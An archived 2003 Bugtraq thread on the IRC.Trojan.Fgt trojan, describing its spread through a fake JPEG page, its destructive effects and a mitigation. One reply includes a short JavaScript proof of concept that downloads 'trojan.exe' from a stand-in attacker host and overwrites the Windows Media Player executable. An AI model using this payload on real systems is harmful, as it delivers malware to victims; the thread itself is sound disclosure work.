Bugtraq mailing list archives
Re: a dangerous fast spreading (yet simple) trojan horse (Now IRC.Trojan.Fgt)
From: K-OTiK Security <Special-Alerts () k-otik com>
Date: 28 Oct 2003 08:59:58 -0000
In-Reply-To: <20031027174719.11875.qmail () sf-www1-symnsj securityfocus com> This trojan is now identified : IRC.Trojan.Fgt [Symantec] IRC-Worm.Fagot [Kaspersky], Fagot [F-Secure] Type: Trojan Horse Infection Length: 156,672 bytes IRC.Trojan.Fgt is a downloaded file that disables firewall and security software,it works by sending messages via IRC chat, trying to get people to click on a web link, which would download "britney.jpg" from www.angelfire.com. It deletes critical system files and changes the Internet Explorer home page to a pornographic page. The website which was responsible for distributing this threat is no longer available. So the worm doesn't work any more (this version). More : http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.html Regards. K-OTik Staff /// http://www.k-otik.com
From: K-OTiK Security <Special-Alerts () k-otik com> To: bugtraq () securityfocus com Subject: Re: a dangerous fast spreading (yet simple) trojan horse. it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet Explorer File Download and Execution" : http://www.k-otik.com/WMPLAYER-TEST/ http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2 http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm To prevent this exploit : Disable Active Scripting Regards. K-Otik Staff /// http://www.k-otik.com ----------------------- POC ------------------------- var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://attacker/trojan.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; -----------------------------------------------------From: "Gadi Evron" <ge () egotistical reprehensible net> Subject: a dangerous fast spreading (yet simple) trojan horse. Date: Mon, 27 Oct 2003 16:52:57 -0800 I usually do not email about "new" trojan horses unless they have something "special" about them, for there are a lot of them coming out non-stop. However, with this one, Although quite simple, is very destructive and spreading at incredible speed. The trojan horse spreads by people going to different URL's to download a *.jpg (started with britney.jpg). The jpeg is actually an HTML file, and when the web browser receives it, it thinks that it is a server error message for the file not existing, and loads the page. In the page we find a javascript line, that using hex encoding in an attempt to hide what it does, downloads patch.exe and replaces mplayer.exe with the new file. patch.exe connects to the mIRC DDE server, causing mIRC to spam, and then it start ruining the system's registry. Starting to delete keys at root and enumerating from there, one at a time. What I signify, and forgive my language, as an "Hump and dump" trojan horse. This reminds me of the first patch.exe trojan horse, that was purely a destructive file - back in 95/96. I would also like to commend angelfire for shutting down the first web page this appeared on very quickly. They always respond to abuse in a timely manner. The geocities page is still up last time I checked. Not very complicated, but interesting, and very dangerous. Gadi Evron (i.e. ge), ge () linuxbox org. -------- gevron () netvision net il PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID). Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741.
Current thread:
- Re: a dangerous fast spreading (yet simple) trojan horse (Now IRC.Trojan.Fgt) K-OTiK Security (Oct 28)